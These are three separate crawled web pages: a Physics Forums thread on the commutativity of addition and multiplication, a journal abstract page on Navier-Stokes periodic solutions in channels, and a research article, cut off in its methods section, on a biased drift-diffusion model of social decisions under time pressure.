https://www.physicsforums.com/threads/algebra-question.714911/
|
# Algebra Question
Hello,
I wanted to confirm that I am understanding something correctly. I have been doing this all the time, and have never had any problems with it. For some reason now I am wanting to confirm it.
So, if you have something such as: x3-6+y2-√z it would be equivalent to write it as: y2+x3-√z-6
Can you always rearrange terms like this, no matter what they are? What I do is write it as an addition problem so I can change the order, since you can change the order in addition.
For example if you have: log(x)-x3 you could write it as log(x)+(-x3) then as -x3 + log(x).
Just as -11+5-3+5=-4 would be the same as 5-11-3+5=-4 or -11-3+5+5=-4
Does my reasoning seem correct?
Thanks
Last edited:
Yes that is correct. I believe that falls under the commutative property which essentially states
x + y = y + x
And this would also go for multiplication, but not division correct?
Correct.
Example using decimal notation:
2*4 = 8 and 4*2 = 8
8 = 8 TRUE
2/4 = .5 and 4/2 = 2
.5 = 2 FALSE
And here's a tip, never be afraid to go back to the most basic of examples to solidify your thoughts if you start question them. Forget the log(x) and y^3 stuff and just use a scratch piece of paper and walk through simple things like 1+2 = 2+1 to convince yourself that the order of addition does not matter.
arildno
Homework Helper
Gold Member
Dearly Missed
Hi, ThomasMagnus!
As the others have said, you are correct.
The two operations multiplication and addition are COMMUTATIVE, i.e, you can change the order in which they appear.
Division and subtraction are NOT commutative, we can call them ANTI-commutative if you like.
But, as you yourself noted, can't we in 5-4 rewrite this as 5+(-4)=(-4)+5?
Yes, we can, by using negative numbers in addition, we can think of the operation of subtraction as "redundant", i.e, the info is contained in the use of adding with negative numbers instead.
That makes for easier calculations, because you then can go about commuting as much as you want!
In 5-(-4), for example, we just write 5-(-4)=5+(-(-4))=(-(-4))+5 and so on.
Does something similar exist with division relative to multiplication?
Yes, because division by a non-zero number "a" can always be thought of as multiplication with the reciprocal of "a", i.e, 1/a.
Thus, 2/4=2*(1/4)=(1/4)*2.
----------------
By thinking in terms of "negative numbers" and "reciprocals", you really have only two basic operations to worry about, addition and multiplication, rather than four operations.
(And, if you think of multiplication as repeated addition, there's only one fundamental operation to worry about..)
HallsofIvy
Homework Helper
And this would also go for multiplication, but not division correct?
Yes, and note that it is largely because (well, perhaps even more that addition and multiplication are "associative" while subtraction and division are not) that we do not consider subtraction and division as separate "operations" but just the inverses of additon and multiplication. That is, that "a subtract b" is just "a plus the additive inverse of b" and "a divided by b" is "a multiplied by the multiplicative inverse of b".
arildno
Homework Helper
Gold Member
Dearly Missed
When we think of ONE operation to be performed, commutativity is the only property that comes into the picture.
However, when we have two or more operations to be performed, we must also take into account what we call the associativity of the operations, that is, what relevance it has which operation we perform first.
We have, for example, for numbers "a", "b" and "c" that:
(a+b)+c=a+(b+c), that is, it doesn't matter WHICH addition we perform first. Addition is associative.
But, is:
(a-b)-c=a-(b-c)??
You easily see that subtraction is NOT associative at all;
We have that (a-b)-c=a-(b+c), whereas a-(b-c)=(a-b)+c
Thank you for the info! So the next time I see something in an answer key as something along the lines of x-b+c and I have -b+c+x I can assume they are the exact same, correct? Also, does this go for all terms, even something such as ln|x-1|-ln|x|+6=-ln|x|+ln|x-1|+6 ?
Thanks!
arildno
Homework Helper
Gold Member
Dearly Missed
"Also, does this go for all terms, even something such as ln|x-1|-ln|x|+6=-ln|x|+ln|x-1|+6"
That's right!
1 person
|
2021-05-12 18:52:42
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.819445788860321, "perplexity": 729.7299646098163}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243989766.27/warc/CC-MAIN-20210512162538-20210512192538-00157.warc.gz"}
|
https://www.projecteuclid.org/euclid.kjm/1256219158
|
## Journal of Mathematics of Kyoto University
### The relation between stationary and periodic solutions of the Navier-Stokes equations in two or three dimensional channels
Teppei Kobayashi
#### Abstract
In this paper we will consider whether there exists a time periodic solution of the Navier-Stokes equations for infinite channels in $\mathbb{R}^n(n=2,3)$. H. Beirão da Veiga [4] treated such a problem. This paper is the special case of his paper and we argue the relation between the existence of stationary and time periodic solutions of the Navier-Stokes equations.
#### Article information
Source
J. Math. Kyoto Univ., Volume 49, Number 2 (2009), 307-323.
Dates
First available in Project Euclid: 22 October 2009
https://projecteuclid.org/euclid.kjm/1256219158
Digital Object Identifier
doi:10.1215/kjm/1256219158
Mathematical Reviews number (MathSciNet)
MR2571843
Zentralblatt MATH identifier
1180.35414
#### Citation
Kobayashi, Teppei. The relation between stationary and periodic solutions of the Navier-Stokes equations in two or three dimensional channels. J. Math. Kyoto Univ. 49 (2009), no. 2, 307--323. doi:10.1215/kjm/1256219158. https://projecteuclid.org/euclid.kjm/1256219158
|
2020-01-25 04:31:34
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7793443202972412, "perplexity": 806.5926260738012}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251669967.70/warc/CC-MAIN-20200125041318-20200125070318-00100.warc.gz"}
|
https://www.nature.com/articles/s41467-018-05994-9?error=cookies_not_supported&code=6e230ea0-0d8a-436b-a489-d350bc110824
|
## Introduction
Social decisions typically involve conflicts between selfishness and pro-sociality. A basic goal in decision science is to understand the cognitive processes that underlie these social decisions. There is a large literature describing the various factors that influence other-regarding behavior, including distributional preferences1,2,3, reciprocity4, social distance5, and guilt-aversion6, but these are all static models that simply predict choice outcomes. Recently there have been efforts to understand the dynamics of social decision making, with both single-process7,8,9 and dual-process10,11,12 models. However, the nature of social decision making is still disputed13,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24.
One question is whether social decisions are the result of a single comparison process, or the result of two processes: one, a fast and intuitive process and the other, a slow and deliberative process7,10? The second question is whether people exhibit a selfish or pro-social bias? The latter question is usually posed under the presumption of dual processes: given that there is an intuitive process, does it favor selfishness or pro-sociality?
To answer this question, some dual-process researchers have examined relative response times (RT)10,11,13,14,17,18,19,23 to establish people’s intuitions. However, it has recently been argued that RT data cannot be used as evidence for intuitive/deliberative processes, since they are sensitive to the particular choice problems used by the researchers7,16,25.
An alternative approach which does not have this limitation is to experimentally manipulate RT (e.g., using time pressure) or impose cognitive load to try to establish people’s intuitive responses. In this manipulation literature, some have made a distinction between behavior in giving contexts (e.g., dictator games) and in cooperative contexts (e.g., public goods games).
In the giving context, subjects are simply asked whether they would like to give some of their money to another person (or charity). Here, some studies conclude that promoting intuition increases altruistic behavior15, while others find no effect of promoting intuition20. A meta-analysis finds that promoting intuition increases giving for women but not for men26.
In the cooperative context, subjects are put into groups of two or more and can pay a cost to give a larger benefit to the other(s) in their group. Here, some studies conclude that people’s intuition favors cooperation10,24,27, while other studies conclude that promoting intuition has no effect on cooperation21,22,28; a meta-analysis finds that intuition promotes cooperation29, and that—unlike for giving behavior—this is equally true for both women and men30. (One study in which participants were incentivized to make a choice quickly and then could subsequently change their decision did not find a difference between giving and cooperation31). Here we have decided to focus on the giving context, since these games are easier to interpret, as they do not depend on subjects’ beliefs about others’ choices.
Given the mixed evidence for whether intuition favors pro-sociality, cooperation, or selfishness, we return to the question of whether a single comparison process might better describe social decisions. A growing literature in decision neuroscience has argued for the prevalence of sequential sampling model (SSM) processes in decision making and cognition. These models, exemplified by the diffusion model (DDM), assume that information is sampled continuously until there is sufficient net evidence for one of the available options32.
One challenge to the simple SSM story in ref. 7 is the body of time pressure results reported in some articles10,21,24,27,28. If, indeed, time pressure amplifies existing behavioral tendencies10, an unbiased SSM (no starting point bias) cannot account for that behavior. In a SSM framework, time pressure reduces the amount of evidence needed to reach a decision, reducing RT but also consistency. In an unbiased SSM, reducing consistency should push the probability of any particular response towards 50%.
In some cases, decision makers may exhibit a bias towards one response, perhaps because that response consistently yields better outcomes. This behavior is captured by a bias in the starting point of the process33,34,35,36,37. In such cases, reducing the amount of evidence needed to reach a decision will amplify the choice bias. The starting point is therefore the natural candidate for explaining the purported effects of time pressure on social preferences.
We have two goals in this paper. The first is to document the effects of time-pressure and time-delay, using a wide array of decision problems and accounting for individuals’ social preferences. The second is to argue for a DDM with biased starting points (“biased DDM”), which integrates the dual process framework with the SSM framework and can account for both RTs and the effects of time manipulations. We provide a clear mechanism for how a predisposition (which some might call an “intuition”) and deliberation might interact to yield a decision. In sum, we aim to offer a unified account of social decision making that provides a clear explanation for the conflicting RT and time-pressure data in the literature.
We test our model using an experiment where subjects made binary decisions in a series of mini-dictator games, in time-free, time-pressure, and time-delay conditions. We take each subject’s change in pro-sociality from time-delay to time-pressure conditions as the measure of their predisposition. We find that people are heterogeneous in whether they are predisposed to pro-sociality (more pro-social under time pressure) or selfishness (more selfish under time pressure). In an out-of-sample test, this predisposition predicts subjects’ pro-sociality in the time-free condition. We then fit the biased DDM to the time-free data, show that it outperforms an unbiased DDM (and in some cases, a standard logistic choice model8), and find that subjects’ predispositions predict their starting points in the model. In particular, subjects with starting points biased towards pro-sociality become more pro-social under time pressure and more selfish under time delay, while subjects with starting points biased towards selfishness become more selfish under time pressure and more pro-social under time delay.
## Results
In the experiment, subjects made binary decisions in 200 mini-dictator games, where they allocated money between themselves (dictator) and another subject (receiver) anonymously. Each decision involved a conflict between selfishness and advantageous inequality aversion2 (Fig. 1, Supplementary Fig. 1). In other words, each game offered subjects the opportunity to increase the receiver’s earnings by reducing their own earnings, reducing the inequality between them (see Supplementary Note 1).
We divided the 200 trials into four blocks of 50 games each. In the time-pressure block, subjects had to make each decision within 2 s. In the time-delay block, subjects had to make each decision after viewing the options for 10 s. In the other two (time-free) blocks, subjects had unlimited time to make each decision. The first and last blocks were time-free blocks, while the other two were counterbalanced across subjects (see Methods, Supplementary Methods for more detail).
### The bias towards selfishness or pro-sociality
We employ the inequality aversion model proposed by Fehr and Schmidt2 to estimate subjects’ preferences (advantageous inequality aversion, β) under time-free (βf), time-pressure (βp), and time-delay (βd) conditions separately (see Methods). The estimation results show that the effect of decision time differs substantially across subjects. To see this, we split subjects according to the median indifference β (the β which would make a subject indifferent between the two options) from all of our choice problems; with this cutoff, 93% of the selfish subjects chose the selfish option on the majority of trials, while 100% of the pro-social subjects chose the pro-social option on the majority of trials (see Supplementary Note 2 for analyses based on other cutoffs).
Subjects with higher βf (pro-social subjects) became more pro-social under time pressure (P = 0.024, two-sided Wilcoxon signed-rank test, since β is not normally distributed), while subjects with lower βf (selfish subjects) became more selfish under time pressure (P = 0.041) (Fig. 2a). Similarly, pro-social subjects became marginally less pro-social under time delay (P = 0.167), while selfish subjects became less selfish under time delay (P = 0.004), though these effects are less pronounced (Fig. 2b). The effect of decision time for prosocial and selfish subjects is more obvious if we compare time pressure and time delay conditions directly (Fig. 2c) (see Supplementary Table 1 for regression results).
In addition, βpβd is correlated with βf (two-sided Spearman correlation test, r = 0.390, P = 5 × 10−5, Supplementary Fig. 2, Supplementary Tables 2-3). In other words, subjects were heterogeneous in the way in which reduced time affected their pro-sociality, and this effect predicted their pro-sociality under normal (time-free) conditions.
### Sequential sampling process
Prior studies have shown that behavior in social decision making is in line with SSM predictions7,8,9. Specifically, RT decreases with strength of preference. Our experiment not only allows us to test this hypothesis, but also allows us to test whether this hypothesis still holds under time pressure. In particular, if decisions under time pressure exclusively (or preferentially) rely on an intuitive, automatic process, then we might expect no (or a greatly reduced) relationship between RT and strength of preference.
To test this, we calculated the utility difference between Option A and Option B in the experiment (as an index of the strength of preference) using the estimated preference parameters (βf,βp,βd). Mixed-effects regressions with log(RT) as the dependent variable reveal that RT was negatively related with the absolute utility difference in in the time-free and time-pressure conditions (and marginally in the time-delay condition) (t(4997) = −9.71, P < 0.001 for the time-free condition, t(4997) = −7.186, P < 0.001 for the time-pressure condition, and t(4997) = −1.718, P = 0.086 for the time-delay condition) (Fig. 3). The relationship between RT and strength-of-preference is understandably weaker in the time-delay condition, since it is likely that in many cases subjects decided in under 10 s. In those cases, the true decision times are unobservable, and we should expect no relationship between RT and strength-of-preference.
### The biased DDM
These results paint a complex picture. On the one hand, the relationship that we observe between RT and strength of preference in all time conditions is consistent with a single SSM process. On the other hand, the amplification of preferences under time pressure (and attenuation under time delay) is the opposite of what one would expect from time pressure in an unbiased SSM. Here, we argue that a SSM with starting points biased towards subjects’ generally preferred actions can account for these patterns (Fig. 4).
To make things more concrete, we focus on the DDM32, which was originally developed for memory, cognition, and perception and has been increasingly used to study economic decision making7,8,38,39,40,41,42,43,44,45. The DDM assumes that decisions are generated by a noisy process that accumulates relative evidence (R) that one option is better than the other. The relative evidence R follows a diffusion process and evolves in small time increments according to a stochastic difference equation, Rt+1 = Rt + v + st (with discrete time this is technically a random walk model), where v is the drift rate that represents the average strength of preference for the selfish option, and s represents mean-zero Gaussian noise. A choice is made once reaches one of the two thresholds, normalizing the pro-social threshold to zero and the selfish threshold to a constant, a. An additional feature of the DDM is that there can be an initial bias in the starting point (R0), often referred to as a response bias46, towards selfishness or pro-sociality.
For now, we will assume that these starting points are biased towards a subject’s generally preferred choice; later we will verify this assumption by fitting the starting points to the data. Specifically, the process starts near the selfish threshold for subjects who are generally selfish (R0 > a/2), and the process starts near the pro-social threshold for subjects who are generally pro-social (R0 < a/2).
To see why starting point biases are necessary to account for our choice data, let’s first consider a simple DDM without starting point biases (unbiased DDM). In that model, drift rate is the sole determinant of “preference” in a given choice situation, where we define preference as the option that the subject would choose given unlimited time to decide. In our setting, the drift rate determines whether the subject is more than 50% likely to choose the selfish option, with positive drift rates producing predominantly selfish choices and negative drift rates producing predominantly pro-social choices. For a given drift rate, the threshold separation determines the subject’s preference-choice consistency. With infinite threshold separation, the subject would always choose in line with their preference, while with zero threshold separation, the subject would choose randomly.
In the DDM literature, time pressure is modeled using narrower decision thresholds (or in the case of time limits, collapsing thresholds), which reduce RT at the cost of consistency. This assumption is supported by a large body of research showing that time pressure narrows thresholds but does not affect drift rates32,47,48. Whether thresholds also collapse over time is an active debate in the DDM literature, with conflicting theoretical and empirical arguments49,50,51,52,53.
To visualize the effects of time pressure on choice behavior in the unbiased DDM, we simulated 50 fake subjects with drift rates sampled from a uniform distribution vi[−0.0002, 0.0002]ms−1, and with a threshold separation of either a = 2 or a = 1. For each fake subject, we simulated 1000 trials with each threshold separation. What the simulations clearly show is that these fake subjects’ selfish choice probabilities are consistently closer to 50% with the narrower thresholds, i.e. under time pressure (Fig. 5a; also with collapsing thresholds, see Supplementary Fig. 3a). This is opposite to the pattern we see in our data.
Now let’s consider what happens when subjects’ decisions are partly determined by starting points. With infinite threshold separation, the starting point would have no effect and the subject would always choose in line with their preference. However, with finite threshold separation, the narrower the thresholds, the more influence the starting points have on the decision.
To visualize the effects of time pressure on choice behavior in the DDM with biased starting points (biased DDM), we again simulated 50 fake subjects with the same distribution of drift rates and threshold separations as before. We additionally assumed that each fake subject’s starting point (relative to a/2) was proportional to their drift rate. Specifically, a fake subject’s starting point was R0=a/2 + 5000·v. As before, for each fake subject, we simulated 1000 trials with each threshold separation. What these simulations clearly show is that the fake subjects’ choice probabilities are consistently more extreme with the narrower thresholds, i.e., under time pressure (Fig. 5b; also with collapsing thresholds, see Supplementary Fig. 3b). This is the pattern we see in our data.
These latter simulations assume that a subject’s starting point is proportional to their drift rate. We believe this to be a reasonable assumption, since subjects with more extreme preferences will find themselves more often making the same choice (either selfish or pro-social) and so may want to adjust their starting points further in that direction, to save time. Indeed, this is a likely mechanism for how people generate predispositions. Below, we verify this assumption by showing that βf correlates with starting points. Nevertheless, a simpler model, for example R0 = a/2 ± 0.25, produces the same phenomenon of more extreme choice probabilities with narrower thresholds, but displays a discontinuity in choice behavior, due to the starting-point discontinuity at v = 0 (Fig. 5c; also with collapsing thresholds, see Supplementary Fig. 3c).
The simulations above are simplified in the sense that they assume a single drift rate (i.e., strength-of-preference) per subject. In the real experiment, each subject experienced a variety of decisions and therefore a variety of drift rates. Therefore, as a robustness check, we carried out the simulations behind Fig. 5 using the actual parameters estimated from the time-free data. We then compared the resulting βf and βp estimated from the simulated data. The biased DDM simulations (Supplementary Fig. 4a and Supplementary Fig. 4c) produced similar patterns as seen in the data (Figs. 2, 5). That is, the results show that under time pressure, simulated selfish subjects (split according to median indifference β) became more selfish and simulated pro-social subjects became more pro-social. Similar to Fig. 5a, the pattern produced by the unbiased DDM simulations (Supplementary Fig. 4b and Supplementary Fig. 4d) is not consistent with the results seen in the experiment.
In sum, if the only difference between selfish and pro-social subjects was their drift rates, then time pressure should have brought their behavior closer together (not observed in the data), but if they also differed in their starting points, then time pressure should have made their behavior more extreme (observed in the data). Differences between groups in other parameters might additionally be present, but they cannot explain the time-pressure phenomenon without biased starting points, since the effects of narrower (or collapsing) thresholds on choice (Fig. 5a, Supplementary Figs 3a, 4b, d) do not depend on the initial threshold separation or drift rates.
In the next section, we attempt to verify these conclusions with formal model fits on data independent from the data used to classify subjects as being predisposed to selfish or pro-social behavior. Specifically, we separate subjects based on whether they became more or less pro-social under tighter time constraints. We hypothesized that both groups of subjects would be better fit by DDMs with biased starting points than ones without. We additionally hypothesized that the subjects who became more pro-social under tighter time constraints would exhibit starting points biased towards the pro-social threshold, while subjects who became more selfish under tighter time constraints would exhibit starting points biased towards the selfish threshold.
### Model fitting
We first split subjects based on how their preferences changed from time-pressure to time-delay conditions, resulting in 56 selfishly predisposed subjects (βp < βd) and 46 pro-socially predisposed subjects (βp > βd). Splitting by gender, 24 of 56 (43%) females and 22 of 46 (48%) males were pro-socially predisposed, in contrast to the findings from ref. 26
We fit the DDM at both the group and individual level on the time-free data. We focus exclusively on fitting the time-free data since these are the only data that display the roughly log-normal RT distributions produced by the DDM. The time constraints in the other two conditions distort the RT distributions and preclude fitting DDMs to those data (Supplementary Fig. 5).
Our hypothesis was that the relative starting point, z = R0/a (z[0,1]), would be greater (less) than 0.5 for the selfishly predisposed (pro-socially predisposed) subjects. The starting point z was indeed greater than 0.5 (0.547 at the group level, and an average of 0.564 at the individual level) for selfishly predisposed subjects, and was less than 0.5 (0.403 at the group level and an average of 0.452 at the individual level) for pro-socially predisposed subjects (Table 1, Supplementary Table 4). At the individual level, the starting points were greater than 0.5 for 40 of 56 selfishly predisposed subjects (P = 0.002, two-sided Binomial test), and the starting points were less than 0.5 for 30 of 46 pro-socially predisposed subjects (P = 0.054) (see Supplementary Table 4 and Supplementary Note 3).
In the previous section, we assumed that starting points would be correlated with subjects’ generally favored options. Verifying this assumption, we found that the starting points were negatively correlated with βf (two-sided Spearman correlation test, r = −0.594, P = 10−11, Fig. 6a). Importantly, starting points were also negatively correlated with βpβd (r = −0.460, P = 10−6, two-sided Spearman correlation test) (Fig. 6b, Supplementary Fig. 6). In other words, subjects who were more pro-social under time pressure compared to time delay, showed a larger starting point bias towards the pro-social threshold in the time-free condition. This indicates that we can use starting points, estimated on time-free data, to expose underlying biases which in the past have been inferred by comparing time-constrained conditions.
Finally, a logistic regression of βpβd on DDM parameters (Supplementary Table 5) revealed that the only significant predictor was the starting point bias (P = 0.006). This indicates that the starting point bias is likely the key mechanism to explain the impact of time constraints.
### Model validation
When fitting models to data, there is always a concern of over-fitting. That is why we have focused on the relationship between time-free model parameters and behavior in the time-pressure and time-delay conditions. Taking this idea a step further, in this section we test whether the time-free model with biased starting points (biased DDM) provides better fits after accounting for the number of model parameters (using BIC) and whether it can better predict other out-of-sample time-free data.
Looking at the individual-level fits, the BICs of the biased DDM were lower than the BICs of the unbiased DDM for 71 (of 102) subjects (two-sided Binomial test, P < 10−4). That is, the biased DDM generally fits the data better than the unbiased DDM. Specifically, the biased DDM fits the data better than the unbiased DDM for subjects who have a larger starting point bias, while the unbiased DDM fits the data better than the biased DDM for subjects whose starting point is near 0.5 (Fig. 6a).
Next we validate the biased DDM by comparing its out-of-sample predictions with those of the unbiased DDM and logistic choice models54,55. In one logistic model (Logit), the dependent variable was a dummy indicating whether the choice was selfish or pro-social, and the independent variables were the difference between the dictator’s payoffs (DicDiff) and the difference between the receiver’s payoffs (ReceDiff). In a second logistic model (Logit+RT), we added another independent variable, RT. More specifically, we estimated these models for selfishly predisposed and pro-socially predisposed subjects separately using one half of the data (Games 1–50) and used the estimated parameters to predict choices in the other half of the data (Games 51–100, see Methods). We then calculated the absolute error (AE) between the predicted and empirical probabilities of choosing the selfish option in each game (Table 2; see also Supplementary Figs 79, Supplementary Table 6).
The summed AE for the biased DDM was less than that for the unbiased DDM for both selfishly predisposed and pro-socially predisposed subjects. Since the number of selfishly predisposed and pro-socially predisposed subjects was not equal, we also used Cramer’s λ56 to quantify each model’s predictive power (higher λ = better predictions). Cramer’s λ for the biased DDM (0.198) was higher than that of the unbiased DDM (0.163), Logit (0.1648), and Logit+RT (0.1650). Therefore, the biased DDM generally outperformed the other models in terms of out-of-sample predictions.
## Discussion
Our paper provides an alternative account for the cognitive processes underlying social decision making. Subjects are heterogeneous in whether they generally favor selfishness or pro-sociality. This produces a bias in their initial belief that the selfish or pro-social option is the better choice. Once the options appear, subjects update their initial beliefs by evaluating and comparing the options, in line with a SSM account. Thus, a DDM with biased starting points unifies single- and dual-process accounts of social decision making, allowing us to explain features of the data, and other findings in the literature, that otherwise could not be explained by either account on its own. In particular, it captures the relationship between strength-of-preference and RT, while also explaining why choice biases are magnified under time pressure and attenuated under time delay. Other evidence-accumulation models that are designed to capture intuition57,58 do not explain these results. The model in ref. 57 does not explicitly predict any effects of time pressure or time delay, and the model in ref. 58 predicts a bi-modal RT distribution, which is not the case in our data (Supplementary Fig. 5).
Our out-of-sample prediction results reveal that the biased DDM outperforms the simple unbiased DDM and logistic choice models in predicting choices. Thus, it is important to take these prior biases into account when modeling social decision making. These results also underline the usefulness of computational models for describing social behavior59,60. In particular, what we are suggesting is that time pressure affects decisions not by engaging a different decision process, but instead by simply allowing less time for the decision maker to update from their prior. Thus, under time pressure, the prior plays a larger role in determining the decision.
One might wonder how a starting point would be biased towards the selfish or pro-social option? Starting-point biases are more often associated with response biases (e.g., spatial biases) and it is not immediately obvious how this would translate to a setting where the alternatives vary across trials. One likely possibility is that subjects initially scan their own payoffs to determine which option is better for them, consistent with ref. 17. This is consistent with the idea that most of the non-decision time is for stimulus encoding.
An advantage of our approach is that it relies on a well-established modeling framework that has proven useful in many domains of human behavior61,62 and that has substantial support from neural data63,64,65,66. Moreover, the consequences of starting point biases in SSMs are mathematically precise and well understood, generating falsifiable predictions that can be tested with choice and RT distributions. Although here we have restricted ourselves to the dictator game, this framework could be applied to cooperative settings, provided that beliefs could be measured or estimated, and utilities calculated. This would be a useful next step for this research.
We acknowledge that the direct evidence supporting a DDM-like process under time delay is relatively weak. While we believe that a DDM process is still at work under time delay, the issue is that the true RTs are unobservable. That is, we do not know when subjects actually make their decisions, since they are forced to wait until 10 s have passed before responding. It seems likely that most subjects still do use a DDM, raise their decision thresholds to allow for the extra time, but still finish their decisions well before they are cued to respond. After the cue, they respond at a roughly random time. This is consistent with the roughly Normal RT distribution seen in this condition (Supplementary Fig. 5). It is worth nothing though that the biased DDM simulations under time delay do produce similar choice patterns (Supplementary Fig. 10) as seen in the experimental data (Fig. 2b).
The SSM framework also opens the door for more detailed modeling of dual process cognition, building on other implementations of intuition vs. deliberation57,67,68,69,70. Finally, a starting point bias captures the behavioral phenomenon while being agnostic about its source (e.g., genetics, upbringing, experiment instructions, prior decisions, etc.). More research is required to fully characterize the factors that affect these starting points and how they change over time71.
## Methods
### Subjects
In total 102 subjects (56 females) participated in the experiment. Eighteen subjects took part in an initial experiment at The Ohio State University (OSU), followed by 84 subjects at the University of Konstanz. On average, subjects earned 20 dollars at OSU and 16 Euros at Konstanz (including show-up fees). Subjects gave informed written consent before receiving the instructions at OSU, and we obtained informed consent from subjects when they registered for the experiment at Konstanz. OSU’s Human Subjects Internal Review Board approved the experiment.
### Experimental design
The mini-dictator games under different time conditions had the same properties but minor differences in payoffs. Specifically, the differences between the dictators’ payoffs (DicDiff) were 2, 4, 6, 8, and 10, while the differences between the receivers’ payoffs (ReceDiff) were from 3 to 57, in steps of 6. In every trial, the subject had to decide whether to give up some of their own money in order to increase the other subject’s payoff and reduce the inequality between them. We first fixed the parameters for 50 games in the time-free condition (Games 1–50). We then decreased (increased) all the payoffs by 1 for one half of these games and increased (decreased) all the parameters by 1 for the other half of games to get the 50 games for the time-pressure (-delay) conditions. Finally, we decreased all the parameters by 2 for one half of the games and increased all the parameters by 2 for the other half of games to get the other 50 time-free trials (Games 51–100).
At the beginning of each session, we randomly matched subjects into two-person groups. We randomized the order of the games within the different time conditions for each group.
### Preference estimation
We employ the inequality aversion model proposed by Fehr and Schmidt2 to estimate subjects’ preferences using maximum likelihood estimation (MLE). A subject’s utility for each option in the mini-dictator game is given by
$$U\left( {u_{\mathrm{d}},u_{\mathrm{r}}} \right){\mathrm{ = }}u_{\mathrm{d}} - \beta \left( {u_{\mathrm{d}} - u_{\mathrm{r}}} \right),$$
(1)
where ud is the dictator’s payoff and ur is the receiver’s payoff. The parameter β indicates the subject’s social preference, with higher β indicating stronger pro-sociality.
### Fitting the biased DDM at the group level
We estimated the biased DDM using subjects’ 100 decisions in the time-free condition for selfishly predisposed and pro-socially predisposed subjects separately. We used Fast DM72 with the Kolmogorov-Smirnov method to estimate the model. In the estimation, we let the drift rate (v) depend on the payoffs in each trial. Thus, we estimated a drift rate for each combination of DicDiff and ReceDiff. Since we had 50 different combinations (5 DicDiff and 10 ReceDiff) in our games, this meant 50 drift rates. In the estimation, we also included inter-trial variability of the starting point (szr), but kept szr, the non-decision time (t0), and the threshold (a) constant across games.
### Fitting the DDM at the individual level
We estimated the biased DDM and the unbiased DDM at the individual level using subjects’ 100 decisions in the time-free condition. We used RWiener73 with MLE to estimate the model. In the estimation, we set the drift rate (v) as a linear function of DicDiff and ReceDiff,
$$v = d_{\mathrm{c}} + d_{\mathrm{d}} \ast {\mathrm{DicDiff}} + d_{\mathrm{r}} \ast {\mathrm{ReceDiff}}$$
(2)
Thus, we estimated six parameters in total for the biased DDM: the relative starting point (z), the threshold (a), the non-decision time (t0), the drift constant (dc), the weight on DicDiff (dd), and weight on ReceDiff (dr). In the unbiased DDM, we fixed the relative starting point at z = 0.5. Supplementary Table 4 and Supplementary Table 7 show the details of the estimation results. The BIC for each estimation is given by
$${\mathrm{BIC = }}\ln \left( n \right)k - 2{\mathrm{ln}}(L),$$
(3)
where n is the number of observations in the data, k is the number of parameters estimated by the model, and L is the likelihood in the MLE estimation.
### Nonparametric test
We use Spearman correlation tests whenever looking at the correlation between β and other measures/parameters. The fitting procedure for Fehr-Schmidt model can produce extreme parameter values for some subjects who (almost) always choose the pro-social or selfish options. For example, some subjects have β of 335 or −217, while the typical range of values is between 0 and 1. For a linear Pearson correlation, this can seriously distort the estimates. The rank-based Spearman correlations allow us to include all subjects, and the resulting correlation is almost the same as the Pearson correlation where we exclude these “outlier” subjects.
### Out-of-sample predictions
To do out-of-sample predictions, we estimated the biased DDM and the unbiased DDM based on half of the data in the time-free condition, and then used the estimated parameters to predict subjects’ decisions in the other half of the data. Since we did not have enough trials at the individual level, we estimate these models at the group level. Specifically, we estimated the model using Games 1–50 and 51–100 separately. Here we again used the Kolmogorov-Smirnov method of Fast DM72 (the estimation results are shown in Supplementary Table 8). We used the estimated parameters to simulate the biased DDM and the unbiased DDM 5000 times for each game to determine the predicted probability of the selfish choice in each game.
For the logistic model predictions, we regressed the following two logistic models on the same halves of the data (the regression results are shown in Supplementary Table 9),
$${\mathrm{Logit:Selfish = }}\gamma _0 + \gamma _1 \ast {\mathrm{DicDiff}} + \gamma _2 \ast {\mathrm{ReceDiff}} + \varepsilon ,$$
(4)
$$\begin{array}{l}{\mathrm{Logit + RT:Selfish}}\\ {\mathrm{ = }}\gamma _0{\mathrm{ + }}\gamma _1 \ast {\mathrm{DicDiff}}{\mathrm{ + }}\gamma _2 \ast {\mathrm{ReceDiff}}{\mathrm{ + }}\gamma _3 \ast {\rm RT}{\mathrm{ + }}\varepsilon ,\end{array}$$
(5)
and used the results to calculate the predicted probabilities of selfish choices.
Since the number of selfishly predisposed subjects was different from the number of pro-socially predisposed subjects, we measured the aggregate predictive performance using Cramer’s λ56 which is calculated as
$$\lambda {\mathrm{ = }}\bar P^ + - \bar P^ - ,$$
(6)
